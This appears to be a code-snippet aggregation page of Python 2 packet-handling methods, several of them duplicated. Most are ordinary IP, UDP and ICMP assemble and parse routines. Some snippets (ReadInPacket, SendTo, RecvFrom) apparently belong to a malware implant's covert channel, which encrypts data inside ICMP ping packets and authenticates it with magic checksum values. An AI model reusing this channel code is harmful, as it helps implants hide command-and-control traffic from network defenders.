示例#1
0
    def ReadInPacket(self,pkt):
        self.data = ""
        icmpcsum = inet.cksum(pkt)
        # Initial checks
        #print "Checking entire checksum"
        if icmpcsum != 0:
            print "Ping packet checksum is incorrect....ignoring packet"
            raise ValueError, pkt

        #print "Checking for 0x0809"
        if struct.unpack("!H",pkt[16:18])[0] != 0x0809L:
            print "Did not find 0x0809 just before the checksum"
            raise ValueError, pkt

        #print "Looking for no 0x0a0b"
        if struct.unpack("!H",pkt[18:20])[0] == 0x0a0bL:
            print "Found the invalid checksum 0x0A0B"
            raise ValueError, pkt
        
        icmp_type = pkt[0]
        icmp_code = pkt[1]
        icmp_ident = struct.unpack("!H",pkt[4:6])[0]
        icmp_seq = struct.unpack("!H",pkt[6:8])[0]
        ping_timestamp_sec = struct.unpack("!L",pkt[8:12])[0]
        ping_timestamp_usec = struct.unpack("!L",pkt[12:16])[0]
        chksum1 = struct.unpack("!H",pkt[18:20])[0]
        #print "Checking ident"
        if icmp_ident != self.pid:
            print "Packet not for us.  Possibly for another process?"
            raise ValueError, pkt

        # Checking seq
        if icmp_seq != self.seq:
            print "Packet received out of order"
            raise ValueError, pkt
        
        # Decrypt
        pt = self.implant.cipher.Decrypt(pkt[20:])

        #print "Checking pt checksum"
        if inet.cksum(pt) != 0:
            print "Auth[0] checksum is incorrect"
            raise ValueError, pt
            
        chksum2 = struct.unpack("!H",pt[:2])[0]

        #print "Checking for matching auth[0][0] chksum"
        if chksum2 != chksum1:
            print "Checksum inside auth[0] doesn't match the one on the outside"
            raise ValueError, pt

        if(struct.unpack("!L",pt[4:8])[0] & 0x000000FFL != 0x0L):
            print "Data received in the low order byte of auth[1]"
            raise ValueError, pt
示例#2
0
    def ReadInPacket(self, pkt):
        self.data = ""
        icmpcsum = inet.cksum(pkt)
        # Initial checks
        #print "Checking entire checksum"
        if icmpcsum != 0:
            print "Ping packet checksum is incorrect....ignoring packet"
            raise ValueError, pkt

        #print "Checking for 0x0809"
        if struct.unpack("!H", pkt[16:18])[0] != 0x0809L:
            print "Did not find 0x0809 just before the checksum"
            raise ValueError, pkt

        #print "Looking for no 0x0a0b"
        if struct.unpack("!H", pkt[18:20])[0] == 0x0a0bL:
            print "Found the invalid checksum 0x0A0B"
            raise ValueError, pkt

        icmp_type = pkt[0]
        icmp_code = pkt[1]
        icmp_ident = struct.unpack("!H", pkt[4:6])[0]
        icmp_seq = struct.unpack("!H", pkt[6:8])[0]
        ping_timestamp_sec = struct.unpack("!L", pkt[8:12])[0]
        ping_timestamp_usec = struct.unpack("!L", pkt[12:16])[0]
        chksum1 = struct.unpack("!H", pkt[18:20])[0]
        #print "Checking ident"
        if icmp_ident != self.pid:
            print "Packet not for us.  Possibly for another process?"
            raise ValueError, pkt

        # Checking seq
        if icmp_seq != self.seq:
            print "Packet received out of order"
            raise ValueError, pkt

        # Decrypt
        pt = self.implant.cipher.Decrypt(pkt[20:])

        #print "Checking pt checksum"
        if inet.cksum(pt) != 0:
            print "Auth[0] checksum is incorrect"
            raise ValueError, pt

        chksum2 = struct.unpack("!H", pt[:2])[0]

        #print "Checking for matching auth[0][0] chksum"
        if chksum2 != chksum1:
            print "Checksum inside auth[0] doesn't match the one on the outside"
            raise ValueError, pt

        if (struct.unpack("!L", pt[4:8])[0] & 0x000000FFL != 0x0L):
            print "Data received in the low order byte of auth[1]"
            raise ValueError, pt
示例#3
0
    def SendTo(self, data):
        self.PreSendChecks()
        # Get current time
        curr_time = time.time()
        curr_time_sec = int(curr_time)
        curr_time_usec = int((curr_time - float(curr_time_sec)) * 1000000.)

        # Construct the ICMP header
        idseq = struct.pack("!HH", self.pid, self.seq)
        icmp_header = chr(8) + chr(self.code) + '\000\000' + idseq

        # Construct the ECHO header and checksum
        echo_header_tmp = struct.pack("!LLH", \
                                      curr_time_sec, curr_time_usec, 0x0809)
        echo_header = echo_header_tmp + '\000\000'
        echo_header_cksum = inet.cksum(icmp_header + echo_header)
        echo_header_cksum = (struct.unpack(
            "!L", '\000\000' + struct.pack("!H", echo_header_cksum)))[0]

        # Make sure the checksum is not 0x0a0b
        if echo_header_cksum == 0x0a0b:
            echo_header_tmp = struct.pack("!LLH", curr_time_sec,
                                          curr_time_usec + 1, 0x0809)
            echo_header_cksum = struct.unpack(
                "!L", '\000\000' + struct.pack("!H", echo_header_cksum))[0]

        # Add the checksum to the header
        echo_header = echo_header_tmp + struct.pack("H", echo_header_cksum)

        # Auth[0] = [ cksum for echo_header ] [ cksum for data ]
        data_cksum = inet.cksum( struct.pack("H",echo_header_cksum&0xffffL) +\
                                 '\000\000' + struct.pack("!L", 0xffffff00L) +\
                                 data)
        auth_0 = struct.pack("HH", echo_header_cksum, data_cksum)
        auth_1 = struct.pack("!L", 0xffffff00L)

        msg = auth_0 + auth_1 + data
        # Encrypt if necessary
        if self.implant.cipher:
            msg = self.implant.cipher.Encrypt(msg)
        # Compress if necessary
        if self.compression:
            msg = compression.Compress(msg)

        # Reconstruct the ICMP header with the checksum
        icmp_header = chr(8) + chr(0) +\
                      struct.pack("H", inet.cksum(icmp_header + \
                                                  echo_header +\
                                                  msg)) + idseq

        # Send it out
        fpos = icmp_header + echo_header + msg
        self.sock.sendto(fpos, self.dest)
示例#4
0
    def SendTo(self, data):
        self.PreSendChecks()
        # Get current time
        curr_time = time.time()
        curr_time_sec = int(curr_time)
        curr_time_usec = int((curr_time - float(curr_time_sec))*1000000.)
        
        # Construct the ICMP header
        idseq = struct.pack("!HH", self.pid, self.seq)
        icmp_header = chr(8) + chr(self.code) + '\000\000' + idseq

        # Construct the ECHO header and checksum
        echo_header_tmp = struct.pack("!LLH", \
                                      curr_time_sec, curr_time_usec, 0x0809)
        echo_header = echo_header_tmp + '\000\000'
        echo_header_cksum = inet.cksum(icmp_header + echo_header)
        echo_header_cksum = (struct.unpack("!L", '\000\000' + struct.pack("!H",echo_header_cksum)))[0]

        # Make sure the checksum is not 0x0a0b
        if echo_header_cksum == 0x0a0b:
            echo_header_tmp = struct.pack("!LLH", curr_time_sec,
                                          curr_time_usec+1, 0x0809)
            echo_header_cksum = struct.unpack("!L", '\000\000' + struct.pack("!H",echo_header_cksum))[0]

        # Add the checksum to the header
        echo_header = echo_header_tmp + struct.pack("H", echo_header_cksum)

        # Auth[0] = [ cksum for echo_header ] [ cksum for data ]
        data_cksum = inet.cksum( struct.pack("H",echo_header_cksum&0xffffL) +\
                                 '\000\000' + struct.pack("!L", 0xffffff00L) +\
                                 data)
        auth_0 = struct.pack("HH",echo_header_cksum, data_cksum)
        auth_1 = struct.pack("!L",0xffffff00L)

        msg = auth_0 + auth_1 + data
        # Encrypt if necessary
        if self.implant.cipher:
            msg = self.implant.cipher.Encrypt(msg)
        # Compress if necessary
        if self.compression:
            msg = compression.Compress(msg)

        # Reconstruct the ICMP header with the checksum
        icmp_header = chr(8) + chr(0) +\
                      struct.pack("H", inet.cksum(icmp_header + \
                                                  echo_header +\
                                                  msg)) + idseq

        # Send it out
        fpos = icmp_header + echo_header + msg
        self.sock.sendto(fpos, self.dest)
示例#5
0
    def __disassemble(self, raw_packet, cksum=0):
        # The kernel computes the checksum, even on a raw packet.
        packet = inet.net2iph(raw_packet)
        b1 = ord(packet[0])
        self.v = (b1 >> 4) & 0x0f
        self.hl = b1 & 0x0f
        if self.v != IPVERSION:
            raise ValueError, "cannot handle IPv%d packets" % self.v
        hl = self.hl * 4

        # verify the checksum
        self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff
        if cksum:
            our_cksum = inet.cksum(packet[:20])
            if our_cksum != 0:
                raise ValueError, packet

        # unpack the fields
        elts = struct.unpack('cchhhcc', packet[:hl - 10])
        # struct didn't do !<> when this was written
        self.tos = ord(elts[1])
        self.len = elts[2] & 0xffff
        self.id = elts[3] & 0xffff
        self.off = elts[4] & 0xffff
        self.ttl = ord(elts[5])
        self.p = ord(elts[6])
        self.data = packet[hl:]
        self.src = packet[hl - 8:hl - 4]
        self.dst = packet[hl - 4:hl]
        self.__unparse_addrs()
示例#6
0
    def __disassemble(self, raw_packet, cksum=0):
        # The kernel computes the checksum, even on a raw packet.
        packet = inet.net2iph(raw_packet)
        b1 = ord(packet[0])
        self.v = (b1 >> 4) & 0x0f
        self.hl = b1 & 0x0f
        if self.v != IPVERSION:
            raise ValueError, "cannot handle IPv%d packets" % self.v
        hl = self.hl * 4

        # verify the checksum
        self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff
        if cksum:
            our_cksum = inet.cksum(packet[:20])
            if our_cksum != 0:
                raise ValueError, packet

        # unpack the fields
        elts = struct.unpack('cchhhcc', packet[:hl - 10])
        # struct didn't do !<> when this was written
        self.tos = ord(elts[1])
        self.len = elts[2] & 0xffff
        self.id = elts[3] & 0xffff
        self.off = elts[4] & 0xffff
        self.ttl = ord(elts[5])
        self.p = ord(elts[6])
        self.data = packet[hl:]
        self.src = packet[hl - 8:hl - 4]
        self.dst = packet[hl - 4:hl]
        self.__unparse_addrs()
示例#7
0
    def __disassemble(self, raw_packet, cksum=0):
	# Ok, I didn't realize this. The kernel does the checksum for
	# you, even on a raw packet. Plus, the Python cksum code seems
	# to be buggy. It's different than the IP version by ...01010
	packet = inet.net2iph(raw_packet)
	b1 = ord(packet[0])
	self.v = (b1 >> 4) & 0x0f
	self.hl = b1 & 0x0f
	if self.v != IPVERSION:
	    raise ValueError, "cannot handle IPv%d packets" % self.v
	hl = self.hl * 4

	# verify the checksum
	self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff
	if cksum:
	    our_cksum = inet.cksum(packet[:20])
	    if our_cksum != 0:
		raise ValueError, packet

	# unpack the fields
	elts = struct.unpack('cchhhcc', packet[:hl-10])
        # struct didn't do !<> when this was written
	self.tos = ord(elts[1]) 
	self.len = elts[2] & 0xffff
	self.id = elts[3] & 0xffff
	self.off = elts[4] & 0xffff
	self.ttl = ord(elts[5])
	self.p = ord(elts[6])
	self.data = packet[hl:]
	self.src = packet[hl-8:hl-4]
	self.dst = packet[hl-4:hl]
	self.__unparse_addrs()
示例#8
0
    def assemble(self, cksum=0):
        "Get a packet suitable for sending over an IP socket."
        # make sure all the data is ready
        self.len = self.hl * 4 + len(self.data)
        self.__parse_addrs()
        # create the packet
        header = struct.pack('cchhhcc',
                             chr((self.v & 0x0f) << 4
                                 | (self.hl & 0x0f)),    # 4bits each
                             chr(self.tos & 0xff),
                             self.len,
                             self.id,
                             self.off,     # what about flags?
                             chr(self.ttl & 0xff),
                             chr(self.p & 0xff))
        if cksum:
            self.sum = inet.cksum(header + '\000\000' + self.__src +
                                  self.__dst)
            packet = header + struct.pack('h', self.sum) \
                + self.__src + self.__dst
        else:
            packet = header + '\000\000' + self.__src + self.__dst
        packet = packet + self.data

        self.__packet = inet.iph2net(packet)
        return self.__packet
示例#9
0
    def __disassemble(self, raw_packet, cksum=0):
	# Ok, I didn't realize this. The kernel does the checksum for
	# you, even on a raw packet. Plus, the Python cksum code seems
	# to be buggy. It's different than the IP version by ...01010
	packet = inet.net2iph(raw_packet)
	b1 = ord(packet[0])
	self.v = (b1 >> 4) & 0x0f
	self.hl = b1 & 0x0f
	if self.v != IPVERSION:
	    raise ValueError, "cannot handle IPv%d packets" % self.v
	hl = self.hl * 4

	# verify the checksum
	self.sum = struct.unpack('h', packet[10:12])[0] & 0xffff
	if cksum:
	    our_cksum = inet.cksum(packet[:20])
	    if our_cksum != 0:
		raise ValueError, packet

	# unpack the fields
	elts = struct.unpack('cchhhcc', packet[:hl-10])
        # struct didn't do !<> when this was written
	self.tos = ord(elts[1]) 
	self.len = elts[2] & 0xffff
	self.id = elts[3] & 0xffff
	self.off = elts[4] & 0xffff
	self.ttl = ord(elts[5])
	self.p = ord(elts[6])
	self.data = packet[hl:]
	self.src = packet[hl-8:hl-4]
	self.dst = packet[hl-4:hl]
	self.__unparse_addrs()
示例#10
0
    def assemble(self, cksum=0):
	"Get a packet suitable for sending over an IP socket."
	# make sure all the data is ready
	self.len = self.hl * 4 + len(self.data)
	self.__parse_addrs()
	# create the packet
	header =  struct.pack('cchhhcc',
			      chr((self.v & 0x0f) << 4 
				  | (self.hl & 0x0f)),    # 4bits each
			      chr(self.tos & 0xff),
			      self.len,
			      self.id,
			      self.off,     # what about flags?
			      chr(self.ttl & 0xff),
			      chr(self.p & 0xff))
	if cksum:
	    self.sum = inet.cksum(header + '\000\000' + self.__src +
				  self.__dst)
	    packet = header + struct.pack('h', self.sum) \
		     + self.__src + self.__dst
	else:
	    packet = header + '\000\000' + self.__src + self.__dst 
	packet = packet + self.data

	self.__packet = inet.iph2net(packet)
	return self.__packet
示例#11
0
 def assemble(self, cksum=1):
   idseq = struct.pack('hh', self.id, self.seq)
   packet = chr(self.type) + chr(self.code) + '\000\000' + idseq + self.data
   if cksum:
     self.cksum = inet.cksum(packet)
     packet = chr(self.type) + chr(self.code) + struct.pack('H', self.cksum) + idseq + self.data
   self.__packet = packet
   return self.__packet
示例#12
0
    def SendTo(self,data):
        data_cksum = inet.cksum( '\000\000\000\000' + \
                                 struct.pack("!L",0xffffff00L) + data)
        auth_0 = struct.pack("HH",0,data_cksum)
        auth_1 = struct.pack("!L",0xffffff00L)

        msg = auth_0 + auth_1 + data
        msg = self.implant.cipher.Encrypt(msg)
        self.sock.send(msg)
示例#13
0
    def assemble(self, cksum=1):
	self.ulen = 8 + len(self.data)
	begin = struct.pack('hhh', self.sport, self.dport, self.ulen)
	packet = begin + '\000\000' + self.data
	if cksum:
	    self.sum = inet.cksum(packet)
	    packet = begin + struct.pack('h', self.sum) + self.data
	self.__packet = inet.udph2net(packet)
	return self.__packet
示例#14
0
 def __disassemble(self, raw_packet, cksum=1):
     packet = inet.net2updh(raw_packet)
     if cksum and packet[6:8] != '\000\000':
         our_cksum = inet.cksum(packet)
         if our_cksum != 0:
             raise ValueError, packet
     elts = map(lambda x: x & 0xffff, struct.unpack('hhhh', packet[:8]))
     [self.sport, self.dport, self.ulen, self.sum] = elts
     self.data = packet[8:]
示例#15
0
 def assemble(self, cksum=1):
     self.ulen = 8 + len(self.data)
     begin = struct.pack('hhh', self.sport, self.dport, self.ulen)
     packet = begin + '\000\000' + self.data
     if cksum:
         self.sum = inet.cksum(packet)
         packet = begin + struct.pack('h', self.sum) + self.data
     self.__packet = inet.udph2net(packet)
     return self.__packet
示例#16
0
    def __disassemble(self, raw_packet, cksum=1):
	packet = inet.net2updh(raw_packet)
	if cksum and packet[6:8] != '\000\000':
	    our_cksum = inet.cksum(packet)
	    if our_cksum != 0:
		raise ValueError, packet
	elts = map(lambda x:x & 0xffff, struct.unpack('hhhh', packet[:8]))
	[self.sport, self.dport, self.ulen, self.sum] = elts
	self.data = packet[8:]
示例#17
0
 def __disassemble(self, packet, cksum=1):
   if cksum:
     our_cksum = inet.cksum(packet)
     if our_cksum != 0:
       raise ValueError, packet
   self.type = ord(packet[0])
   self.code = ord(packet[1])
   elts = struct.unpack('hhh', packet[2:8])
   [self.cksum, self.id, self.seq] = map(lambda x:x & 0xffff, elts)
   self.data = packet[8:]
示例#18
0
 def assemble(self, cksum=1):
     idseq = struct.pack("hh", self.id, self.seq)
     packet = chr(self.type) + chr(self.code) + "\000\000" + idseq + self.data
     if cksum:
         self.cksum = inet.cksum(packet)
         packet = chr(self.type) + chr(self.code) + struct.pack("h", self.cksum) + idseq + self.data
     # Don't need to do any byte-swapping, because idseq is
     # appplication defined and others are single byte values.
     self.__packet = packet
     return self.__packet
示例#19
0
    def __disassemble(self, packet, cksum=1):
        if cksum:
            our_cksum = inet.cksum(packet)
            if our_cksum != 0:
                raise ValueError, packet

        self.type = ord(packet[0])
        self.code = ord(packet[1])
        elts = struct.unpack('hhh', packet[2:8])
        [self.cksum, self.id, self.seq] = map(lambda x: x & 0xffff, elts)
        self.data = packet[8:]
示例#20
0
    def RecvFrom(self):
        stuff = self.sock.recv(1500)
        # Decrypt
        pt = self.implant.cipher.Decrypt(stuff)

        if inet.cksum(pt) != 0:
            print "Auth[0] checksum is incorrect"
            raise ValueError, pt

        if (struct.unpack("!L", pt[4:8])[0] & 0x000000FFL != 0x0L):
            print "Data received in the low order byte of auth[1]"
            raise ValueError, pt
示例#21
0
 def assemble(self, cksum=1):
     idseq = struct.pack('hh', self.id, self.seq)
     packet = chr(self.type) + chr(self.code) + '\000\000' + idseq \
              + self.data
     if cksum:
         self.cksum = inet.cksum(packet)
         packet = chr(self.type) + chr(self.code) \
                  + struct.pack('H', self.cksum) + idseq + self.data
     # Don't need to do any byte-swapping, because idseq is
     # appplication defined and others are single byte values.
     self.__packet = packet
     return self.__packet
示例#22
0
    def RecvFrom(self):
        stuff = self.sock.recv(1500)
        # Decrypt
        pt = self.implant.cipher.Decrypt(stuff)
        
        if inet.cksum(pt) != 0:
            print "Auth[0] checksum is incorrect"
            raise ValueError, pt

        if(struct.unpack("!L",pt[4:8])[0] & 0x000000FFL != 0x0L):
            print "Data received in the low order byte of auth[1]"
            raise ValueError, pt